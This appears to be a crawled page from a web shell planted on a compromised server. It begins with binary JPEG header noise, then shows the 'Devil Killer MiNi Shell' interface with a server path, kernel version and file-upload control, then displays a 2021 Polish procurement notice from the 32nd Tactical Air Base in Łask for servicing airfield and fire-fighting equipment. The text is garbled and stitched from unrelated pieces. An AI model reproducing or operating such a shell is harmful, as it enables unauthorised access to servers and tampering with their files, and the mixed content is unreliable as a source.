JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211026/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211026/0024630901-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Serwisowanie sprzętu lotniskowego i pożarniczego </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">32 Baza Lotnictwa Taktycznego w Łasku</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 730097572</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">9 - go Maja 95</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Łask</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">98-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL714 - Sieradzki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">261 554 592</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">32bltprz@ron.mil.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://32blt.wp.mil.pl/pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Skarb Państwa - Jednostka Wojskowa </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Obrona</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Serwisowanie sprzętu lotniskowego i pożarniczego </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-f9139c7e-358f-11ec-a3fb-0a24f8cd532c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00246309</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-10-26</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00003942/09/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.14 Serwisowanie sprzętu lotniskowego i pożarniczego na 2022 r.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-f9139c7e-358f-11ec-a3fb-0a24f8cd532c <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/32_blot</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Uczestnictwo w postepowaniu wymaga założenia konta użytkownika w sposób określony w<br/>„Regulaminie platformazakupowa.pl dla Użytkowników (Wykonawców)”, dostępnym pod adresem:<br/>https://platformazakupowa.pl/strona/1-regulamin.[2] Korzystanie z Platformy Zakupowej jest bezpłatne.<br/>[3] Niezbędne wymagania sprzętowo-aplikacyjne umożliwiające pracę na Platformie Zakupowej<br/>(platformazakupowa.pl): stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej<br/>niż 512 kb/s, komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor<br/>Intel IV 2 GHZ lub jego nowsza wersja, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10<br/>4, Linux, lub ich nowsze wersje, zainstalowana dowolna przeglądarka internetowa, w przypadku<br/>Internet Explorer minimalnie wersja 10 0., włączona obsługa JavaScript, zainstalowany program Adobe<br/>Acrobat Reader lub inny obsługujący format plików .pdf, Platformazakupowa.pl działa wedługstandardu<br/>przyjętego w komunikacji sieciowej - kodowanie UTF8, Oznaczenie czasu odbioru danych przez<br/>platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego<br/>serwera synchronizowanego z zegarem Głównego Urzędu Miar. [4] Instrukcje korzystania z Platformy<br/>Zakupowej dotyczące w szczególności logowania, składania wniosków o wyjaśnienie treści SWZ,<br/>składania ofert oraz innych czynności podejmowanych w niniejszym postępowaniu przy użyciu<br/>platformazakupowa.pl znajdują się w zakładce „Instrukcje dla Wykonawców&#34; pod adresem<br/>internetowym: https://platformazakupowa.pl/strona/45-instrukcje[5] Do przygotowania oferty oraz<br/>złożenia ewentualnych wyjaśnień oraz dokumentów uzupełniających na etapie badania i oceny ofert,<br/>konieczne jest posiadanie przez osobę upoważnioną do reprezentowania Wykonawcy kwalifikowanego<br/>podpisu elektronicznego, podpisu osobistego lub podpisu zaufanego.[6] Wykonawca jest zobowiązany<br/>do utrzymywania kontaktu z Zamawiającym w sprawie wyjaśnień w zakresie złożonej oferty i śledzenia<br/>komunikatów prywatnych oraz publicznych w postępowaniu.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">W związku z przetwarzaniem danych osobowych Zamawiający informuje, że: <br/>1.	Administratorem danych osobowych jest: 32 Baza Lotnictwa Taktycznego w Łasku, 98-100 Łask, ul. 9-go Maja 95.<br/>2.	Inspektorem ochrony danych osobowych w 32. Bazie Lotnictwa Taktycznego w Łasku jest Pan Paweł Rogala, tel. 261 554 639, email: p.rogala@ron.mil.pl.<br/>3.	Dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu prowadzenia postępowania o udzielenie zamówienia publicznego na serwisowanie sprzętu lotniskowego i pożarniczego , nr 06/TP1 /2022.<br/>4.	Odbiorcami danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych (Dz.U. z 2021 r. poz. 1129), dalej „ustawa Pzp”.<br/>5.	Zgodnie z art. 78 ust. 1 ustawy Pzp, dane osobowe będą przechowywane przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy.<br/>6.	Obowiązek podania danych osobowych Wykonawcy lub osób występujących w jego imieniu jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp.<br/>7.	W odniesieniu do danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO.<br/>8.	Wykonawcy przysługuje:<br/>−	na podstawie art. 15 RODO prawo dostępu do danych osobowych dotyczących;<br/>−	na podstawie art. 16 RODO prawo do sprostowania danych osobowych;<br/>−	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO;<br/>−	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy przetwarzanie danych osobowych narusza przepisy RODO.<br/>9.	Wykonawcy nie przysługuje:<br/>−	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>−	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>−	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">06/TP1/2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 362659,89 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest usługa polegająca na serwisowaniu sprzętu lotniskowego i pożarniczego. Szczegółowy zakres przedmiotu zamówienia, wykaz sprzętu określa załączona do SWZ dokumentacja, składająca się z:<br/>1.1.	Opisu przedmiotu zamówienia – załącznik nr 6 a (dotyczy części 1)do SWZ<br/>1.2.	Formularza cenowego - załącznik nr 3 do SWZ<br/>2.	Oferowana usługa musi odpowiadać wymaganiom zamawiającego, opisanym w Opisie przedmiotu zamówienia – załącznik nr 6a do SWZ, właściwymi <br/>w przedmiocie zamówienia i na warunkach zawartych we wzorze umowy, stanowiącym załącznik nr 4 do SWZ.<br/>3.Część 1 – naprawy, serwisy i konserwacje sprzętu silnikowego, agrotechnicznego oraz zabudowy specjalnej na pojazdach KOL (Kompanii Obsługi Lotniska).<br/>4.	Informacje dotyczące zamówienia:<br/>4.1.	Przedmiot zamówienia będzie realizowany w siedzibie Zamawiającego – 32 Baza Lotnictwa Taktycznego Gucin 58a, 98-113 Buczek, a w przypadku braku możliwości naprawy sprzętu w siedzibie Zamawiającego naprawa zostanie wykonana w warsztacie Wykonawcy.<br/>4.2.	Do wykonania przeglądów konserwacyjnych oraz napraw, Wykonawca użyje części nowych, nie poddawanych regeneracji, o jakości technicznej, co najmniej takiej samej jak zamontowane oryginalnie.<br/>4.3.	Wykonawca zobowiązuje się wykonać usługę będącą przedmiotem umowy zgodnie z obowiązującym prawem i przepisami oraz ogólnie przyjętymi standardami, wykorzystując do tego maksymalnie stan posiadanej wiedzy <br/>i doświadczenia.<br/>4.4.	Wykonawca przed przystąpieniem do naprawy przedstawi kalkulację kosztów naprawy i części do akceptacji przez Zamawiającego.<br/>4.5.	Zamawiający zastrzega sobie prawo do weryfikacji wyceny usługi (ilość roboczogodzin, cena części zamiennych) poprzez zwrócenie się do rzeczoznawcy wg. wyboru Zamawiającego w zakresie podmiotu umowy.<br/>4.6.	W przypadku, gdy różnica ilości roboczogodzin lub ceny części zamiennych oferowanych przez Wykonawcę będzie wyższa niż 20% względem wyceny rzeczoznawcy do rozliczenia usługi strony przyjmują cenę i ilości roboczogodzin wskazanych przez rzeczoznawcę.<br/>4.7.	Koszt wyceny o którym mowa w pkt. 4.6 ponosi Wykonawca w przypadku potwierdzenia przekroczenia 20% wyceny usługi (ilość roboczogodzin, cena części zamiennych).<br/>4.8.	Na wykonaną usługę Wykonawca udziela gwarancji na okres 12 miesięcy, na wymienione części , nie krótszej niż 24 miesiące.<br/>4.9.	Wykonawca zobowiązany jest do niezwłocznego naprawienia w pełnym zakresie szkód materialnych lub zwrotu uzasadnionych wydatków , które powstały wskutek wadliwie wykonanych usług.<br/>4.10.	Wykonawca zawiadomi Zamawiającego, jeżeli w trakcie wykonana usługi naprawy zaistnieje konieczność wymiany dodatkowej części wraz z podaniem ich ceny do akceptacji przed wykonaniem pracy.<br/>4.11.	Pojazdy Wykonawcy po terenie Zamawiającego mogą poruszać się tylko <br/>i wyłącznie po wyznaczonych drogach, określonych podczas instruktażu przed rozpoczęciem prac z zachowaniem środków ostrożności i bezpieczeństwa <br/>w ruchu drogowym.<br/>4.12.	Wykonawca bierze pełną odpowiedzialność za szkody wyrządzone przez jego pojazdy w mieniu Zamawiającego.<br/>4.13.	Wykonawcy zabrania się używać na terenie Jednostki Wojskowej urządzeń latających, zdolnych do przetwarzania obrazu i dźwięku.<br/>4.14.	Ilościowy i jakościowy odbiór usługi będącej przedmiotem umowy będzie dokonywany przez Zamawiającego w miejscu jego wykonania osobno dla każdego urządzenia (protokół sporządza Wykonawca) i zbiorczo (protokół odbioru usług Zamawiającego – sporządzony przez Zamawiającego).<br/>5.	Zamawiający nie dopuszcza składania ofert wariantowych. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 145498,28 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">50110000-9 - Usługi w zakresie napraw i konserwacji pojazdów silnikowych i podobnego sprzętu oraz podobne usługi</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">11 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za najkorzystniejszą zostanie uznana oferta, która uzyska największą sumę punktów obliczonych w oparciu o ustalone kryteria.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">odległość warsztatu</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas reakcji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest usługa polegająca na serwisowaniu sprzętu lotniskowego i pożarniczego. Szczegółowy zakres przedmiotu zamówienia, wykaz sprzętu określa załączona do SWZ dokumentacja, składająca się z:<br/>1.1.	Opisu przedmiotu zamówienia – 6 b ( dotyczy części 2) do SWZ<br/>1.2.	Formularza cenowego - załącznik nr 3 do SWZ<br/>2.	Oferowana usługa musi odpowiadać wymaganiom zamawiającego, opisanym w Opisie przedmiotu zamówienia - 6b do SWZ, właściwymi <br/>w przedmiocie zamówienia i na warunkach zawartych we wzorze umowy, stanowiącym załącznik nr 4 do SWZ.<br/>3. Część 2 – naprawy, serwisy i konserwacje sprzętu silnikowego oraz zabudowy specjalnej na pojazdach WSP ( Wojskowej Straży Pożarnej).<br/>4.	Informacje dotyczące zamówienia:<br/>4.1.	Przedmiot zamówienia będzie realizowany w siedzibie Zamawiającego – 32 Baza Lotnictwa Taktycznego Gucin 58a, 98-113 Buczek, a w przypadku braku możliwości naprawy sprzętu w siedzibie Zamawiającego naprawa zostanie wykonana w warsztacie Wykonawcy.<br/>4.2.	Do wykonania przeglądów konserwacyjnych oraz napraw, Wykonawca użyje części nowych, nie poddawanych regeneracji, o jakości technicznej, co najmniej takiej samej jak zamontowane oryginalnie.<br/>4.3.	Wykonawca zobowiązuje się wykonać usługę będącą przedmiotem umowy zgodnie z obowiązującym prawem i przepisami oraz ogólnie przyjętymi standardami, wykorzystując do tego maksymalnie stan posiadanej wiedzy <br/>i doświadczenia.<br/>4.4.	Wykonawca przed przystąpieniem do naprawy przedstawi kalkulację kosztów naprawy i części do akceptacji przez Zamawiającego.<br/>4.5.	Zamawiający zastrzega sobie prawo do weryfikacji wyceny usługi (ilość roboczogodzin, cena części zamiennych) poprzez zwrócenie się do rzeczoznawcy wg. wyboru Zamawiającego w zakresie podmiotu umowy.<br/>4.6.	W przypadku, gdy różnica ilości roboczogodzin lub ceny części zamiennych oferowanych przez Wykonawcę będzie wyższa niż 20% względem wyceny rzeczoznawcy do rozliczenia usługi strony przyjmują cenę i ilości roboczogodzin wskazanych przez rzeczoznawcę.<br/>4.7.	Koszt wyceny o którym mowa w pkt. 4.6 ponosi Wykonawca w przypadku potwierdzenia przekroczenia 20% wyceny usługi (ilość roboczogodzin, cena części zamiennych).<br/>4.8.	Na wykonaną usługę Wykonawca udziela gwarancji na okres 12 miesięcy, na wymienione części , nie krótszej niż 24 miesiące.<br/>4.9.	Wykonawca zobowiązany jest do niezwłocznego naprawienia w pełnym zakresie szkód materialnych lub zwrotu uzasadnionych wydatków , które powstały wskutek wadliwie wykonanych usług.<br/>4.10.	Wykonawca zawiadomi Zamawiającego, jeżeli w trakcie wykonana usługi naprawy zaistnieje konieczność wymiany dodatkowej części wraz z podaniem ich ceny do akceptacji przed wykonaniem pracy.<br/>4.11.	Pojazdy Wykonawcy po terenie Zamawiającego mogą poruszać się tylko <br/>i wyłącznie po wyznaczonych drogach, określonych podczas instruktażu przed rozpoczęciem prac z zachowaniem środków ostrożności i bezpieczeństwa <br/>w ruchu drogowym.<br/>4.12.	Wykonawca bierze pełną odpowiedzialność za szkody wyrządzone przez jego pojazdy w mieniu Zamawiającego.<br/>4.13.	Wykonawcy zabrania się używać na terenie Jednostki Wojskowej urządzeń latających, zdolnych do przetwarzania obrazu i dźwięku.<br/>4.14.	Ilościowy i jakościowy odbiór usługi będącej przedmiotem umowy będzie dokonywany przez Zamawiającego w miejscu jego wykonania osobno dla każdego urządzenia (protokół sporządza Wykonawca) i zbiorczo (protokół odbioru usług Zamawiającego – sporządzony przez Zamawiającego).<br/>5.	Zamawiający nie dopuszcza składania ofert wariantowych. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 217161,61 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">50800000-3 - Różne usługi w zakresie napraw i konserwacji</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">11 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za najkorzystniejszą zostanie uznana oferta, która uzyska największą sumę punktów obliczonych w oparciu o ustalone kryteria.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">odległość warsztatu</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas reakcji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	Zdolność do występowania w obrocie gospodarczym.<br/>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.<br/>2.	Uprawnienia do prowadzenia określonej działalności 